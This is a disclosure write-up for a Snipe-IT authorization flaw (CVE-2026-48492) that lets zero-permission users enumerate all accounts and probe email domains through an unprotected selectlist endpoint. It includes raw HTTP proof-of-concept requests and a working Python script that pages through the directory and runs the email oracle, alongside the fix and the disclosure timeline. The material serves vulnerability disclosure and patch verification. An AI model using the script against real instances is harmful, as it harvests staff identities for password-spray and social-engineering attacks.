Summary
CVE-2026-48492 affects Snipe-IT versions below 8.5.1. The GET /api/v1/users/selectlist API endpoint is missing the view.selectlists authorization gate that is correctly applied in every other selectlist controller across the codebase. Any user who can log into Snipe-IT — regardless of their permissions — can retrieve a paginated list of all user accounts using only their web session cookie. No API token or elevated privileges are required.
CVSS Severity: Low | CVE: CVE-2026-48492 | GHSA-f3c5-6cw8-fg57
What is Snipe-IT?
Snipe-IT is a widely deployed open-source IT asset management platform used by organisations worldwide to track hardware, software licences, accessories and consumables. Its user directory is sensitive data — particularly in organisations that provision accounts for all staff, contractors, or students.
Vulnerability Details
Root Cause
Snipe-IT defines a view.selectlists Gate in app/Providers/AuthServiceProvider.php to restrict selectlist access to users with operational roles.
[Figure: view.selectlists gate definition in AuthServiceProvider.php]
This gate is correctly applied in AssetModelsController, CategoriesController, CompaniesController, DepartmentsController, ManufacturersController, StatuslabelsController, and SuppliersController. However, app/Http/Controllers/Api/UsersController.php::selectlist() has no authorization check at all:
[Figure: UsersController::selectlist(), missing authorization check]
Note: although the email address is not returned in the JSON response, the database query still selects it and the search parameter matches against it. A caller can therefore confirm whether a given address or domain exists by checking whether a search for it returns any rows, without ever seeing the address itself: an indirect email oracle.
Proof of Concept
Step 1 — Create a zero-permission user
[Figure: zero-permission user created in the Snipe-IT admin UI]
Step 2 — Verify the protected endpoint is blocked
The standard user index (GET /api/v1/users/) correctly returns 403 for a zero-permission user:
[Figure: GET /api/v1/users/ returns 403 for the zero-permission user]
Step 3 — Call the unprotected selectlist
Using the same session cookie, call the unprotected endpoint:
```http
GET /api/v1/users/selectlist HTTP/1.1
Host: 127.0.0.1:1337
sec-ch-ua-platform: "Linux"
X-CSRF-TOKEN: uR1FxcTGaqsU0caTptkhBRayvKzyrBEl3tIFL58I
Accept-Language: en-US,en;q=0.9
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 Chrome/146.0.0.0
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: application/json
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Cookie: snipeit_session=<attacker_session>
Connection: keep-alive
```
Response: full paginated user list with usernames, display names, employee numbers, and user IDs.
[Figure: successful response, user accounts enumerated with zero permissions]
Step 4 — Indirect email oracle
Using the search parameter to enumerate by email domain:
```http
GET /api/v1/users/selectlist?search=@iltosec.com HTTP/1.1
Host: 127.0.0.1:1337
X-Requested-With: XMLHttpRequest
Cookie: snipeit_session=<attacker_session>
```
[Figure: email oracle, filtering users by domain via the search parameter]
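The four PoC steps above, carried out as one script: verify that the user index is denied, verify that the selectlist is not, page through the full directory, and use the search parameter as an email oracle. This is an added example for this write-up, not code from the advisory or from the Snipe-IT project. It assumes the selectlist endpoint returns the select2-style JSON shape `{"items": [...], "pagination": {"more": bool}}` that Snipe-IT's selectlists use; the `BASE_URL`, placeholder cookie and `demo_fetch` data are constructed so the script runs offline, and `http_fetch` is the drop-in for a real instance you are authorised to test.

```python
"""Probe a Snipe-IT instance for CVE-2026-48492 using a low-privilege web session.

Added example, not the advisory's or Snipe-IT's own code. Assumes the
select2-style selectlist response: {"items": [...], "pagination": {"more": bool}}.
"""
import json
import urllib.error
import urllib.parse
import urllib.request
from typing import Callable

BASE_URL = "http://127.0.0.1:1337"                       # hypothetical target from the PoC
SESSION_COOKIE = "snipeit_session=<attacker_session>"    # placeholder, not a real value

# A fetcher maps a relative URL to (status_code, body). Two are provided:
# http_fetch for a live instance, demo_fetch as a constructed offline stand-in.
Fetcher = Callable[[str], tuple[int, str]]


def http_fetch(path: str) -> tuple[int, str]:
    """Issue the request with only the web session cookie, as in the PoC."""
    req = urllib.request.Request(
        BASE_URL + path,
        headers={
            "Accept": "application/json",
            "X-Requested-With": "XMLHttpRequest",
            "Cookie": SESSION_COOKIE,
        },
    )
    try:
        with urllib.request.urlopen(req, timeout=10) as resp:
            return resp.status, resp.read().decode()
    except urllib.error.HTTPError as e:          # 403 etc. arrive here, not as a return
        return e.code, e.read().decode()


def classify(index_status: int, selectlist_status: int) -> str:
    """403 on the index but 200 on the selectlist is the vulnerable signature."""
    if index_status == 403 and selectlist_status == 200:
        return "VULNERABLE"
    if index_status == 403 and selectlist_status == 403:
        return "PATCHED"
    if index_status == 200:
        return "INCONCLUSIVE: session can already view users; use a zero-permission account"
    return f"INCONCLUSIVE: unexpected statuses {index_status}/{selectlist_status}"


def probe(fetch: Fetcher) -> str:
    """Steps 2 and 3 of the PoC with the same session cookie."""
    return classify(fetch("/api/v1/users/")[0], fetch("/api/v1/users/selectlist")[0])


def parse_page(body: str) -> tuple[list[dict], bool]:
    """Assumed response shape: items plus a select2 'more' flag for pagination."""
    data = json.loads(body)
    return data.get("items", []), bool(data.get("pagination", {}).get("more"))


def enumerate_users(fetch: Fetcher, search: str = "", max_pages: int = 1000) -> list[dict]:
    """Walk every page of the selectlist; max_pages bounds a misbehaving server."""
    users: list[dict] = []
    for page in range(1, max_pages + 1):
        q = urllib.parse.urlencode({"search": search, "page": page})
        status, body = fetch(f"/api/v1/users/selectlist?{q}")
        if status != 200:
            break
        items, more = parse_page(body)
        users.extend(items)
        if not more:
            break
    return users


def email_oracle(fetch: Fetcher, candidate: str) -> bool:
    """True if any user matches the search string. The filter spans several
    fields, but a string containing '@' will in practice only match email, so
    a hit confirms an address or domain that the response never shows."""
    return len(enumerate_users(fetch, search=candidate, max_pages=1)) > 0


# Constructed data standing in for a vulnerable instance (offline self-test only).
_DEMO_USERS = [
    {"id": 1, "text": "Alice Example (alice)", "email": "alice@iltosec.com"},
    {"id": 2, "text": "Bob Example (bob)", "email": "bob@iltosec.com"},
    {"id": 3, "text": "Carol Example (carol)", "email": "carol@other.example"},
]


def demo_fetch(path: str) -> tuple[int, str]:
    """Mimics the vulnerable behaviour: index denied, selectlist open, email searchable but hidden."""
    parsed = urllib.parse.urlparse(path)
    qs = urllib.parse.parse_qs(parsed.query)
    if parsed.path.rstrip("/") == "/api/v1/users":
        return 403, '{"status":"error","messages":"forbidden"}'
    search = qs.get("search", [""])[0].lower()
    page = int(qs.get("page", ["1"])[0])
    matches = [u for u in _DEMO_USERS if search in u["email"].lower() or search in u["text"].lower()]
    per_page = 2
    chunk = matches[(page - 1) * per_page : page * per_page]
    items = [{"id": u["id"], "text": u["text"]} for u in chunk]   # email deliberately omitted
    more = page * per_page < len(matches)
    return 200, json.dumps({"items": items, "pagination": {"more": more}})


if __name__ == "__main__":
    fetch = demo_fetch                 # swap in http_fetch for a real, authorised target
    print(probe(fetch))
    print(len(enumerate_users(fetch)), "accounts enumerated")
    print("@iltosec.com exists:", email_oracle(fetch, "@iltosec.com"))
```

The `probe` result is the check a defender wants after upgrading: a zero-permission account should now get 403 on both paths. The oracle function is also the argument for treating the search parameter as part of the attack surface even when a field is stripped from the response.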
Impact
An attacker with only a valid login and zero permissions can:
- Enumerate all active user accounts by paginating through the endpoint
- Harvest usernames for credential stuffing or password spray attacks
- Collect employee numbers and full names for social engineering
- Perform indirect email enumeration via the search parameter
- Map user IDs for further exploitation, e.g. combined with CVE-2026-48493
Fix
Add the existing view.selectlists gate check to UsersController::selectlist() — a single-line fix that brings it in line with every other selectlist controller:
[Figure: fix, $this->authorize("view.selectlists") added to UsersController::selectlist()]
Patched in commit 4f943d4, released in v8.5.1.
Disclosure Timeline
| Date | Event |
|---|---|
| 2026-05-19 | Vulnerability discovered |
| 2026-05-21 | Report submitted to Snipe-IT (HackerOne #55580) |
| 2026-05-21 | Vendor confirmed |
| 2026-05-22 | Correction submitted — authorize('view.selectlists') |
| 2026-05-22 | Patch committed (4f943d4) |
| 2026-05-28 | CVE-2026-48492 assigned, advisory published |
| 2026-05-28 | v8.5.1 released |